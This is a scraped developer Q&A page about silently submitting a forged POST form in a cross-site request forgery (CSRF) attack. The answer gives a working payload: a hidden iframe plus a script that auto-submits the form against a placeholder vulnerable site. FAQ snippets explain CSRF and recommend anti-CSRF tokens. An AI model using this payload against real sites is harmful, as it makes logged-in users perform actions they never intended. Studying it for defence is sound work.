Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Example of silently submitting a POST FORM (CSRF)

Tags:

security

csrf

I'm interested in knowing how it is possible to silently submit a POST form for CSRF, without the user having any notice (the document location being redirected to the POSTed URL is not silent).

Example:

<form method='POST' action='http://vulnerablesite.com/form.php'> <input type='hidden' name='criticaltoggle' value='true' <input type='submit' value='submit'> </form> 

On an external site, what would I need to do to trigger this form automatically and silently?

like image 275
apscience Avatar asked Jul 30 '13 07:07

apscience


People also ask

What is CSRF attack explain with an example and how do you prevent it?

Cross-site request forgery (CSRF, sometimes pronounced “sea surf” and not to be confused with cross-site scripting) is a simple yet invasive malicious exploit of a website. It involves a cyberattacker adding a button or link to a suspicious website that makes a request to another site you're authenticated on.

Can we perform CSRF in GET request?

CSRF GET RequestThe simplest CSRF attack is simply to trick a user into making a GET request to a specific URL. This can done by putting the URL into a deceptively named link. The link could be put in a blog comment (lots of WordPress exploits have used this technique), a post on a web forum, or in a phishing email.

Is CSRF only for forms?

Generally the answer is: Any form should be CSRF protected.

Which of the following can be used to mitigate the CSRF attack?

The most effective method of protecting against CSRF is by using anti-CSRF tokens. The developer should add such tokens to all forms that allow users to perform any state-changing operations. When an operation is submitted, the web application should then check for the presence of the correct token.


1 Answers

One solution would be to open the form’s action in a frame like an iframe:

<iframe style="display:none" name="csrf-frame"></iframe> <form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">   <input type='hidden' name='criticaltoggle' value='true'>   <input type='submit' value='submit'> </form> <script>document.getElementById("csrf-form").submit()</script> 
like image 127
Gumbo Avatar answered Sep 29 '22 12:09

Gumbo